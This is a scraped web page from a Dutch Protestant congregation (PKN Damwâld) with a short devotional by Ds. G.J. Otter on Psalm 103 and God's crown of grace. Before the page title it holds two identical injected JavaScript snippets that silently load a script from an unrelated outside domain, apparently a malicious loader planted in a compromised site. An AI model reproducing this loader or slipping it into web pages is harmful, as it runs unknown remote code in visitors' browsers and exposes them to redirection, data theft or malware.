;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kroon - PKN Damwâld

Kroon

Gepubliceerd op: vrijdag 25 juni 2021

In Psalm 103 staat dat de Here ons een kroon wil geven. Nu lopen we misschien niet zo snel met een kroon en laten we dat over aan koningen of keizers. Toch wil de Here ons Zijn kroon of erekrans geven. “Loof de Here, mijn ziel, die U kroont met goedertierenheid en barmhartigheid”. (Ps. 103 vers 2 en 4b)
De eer en genade die de Here geeft, zijn heel kostbaar. Het is eervol om de kroon te dragen. Misschien lijden we onder een valse schaamte of zijn er andere redenen om die kroon niet te dragen. Toch stierf de Here Jezus voor ons om die genade te dragen. Zijn wij mensen waaraan te merken is dat wij van Gods goedheid leven?

Ds. G.J. Otter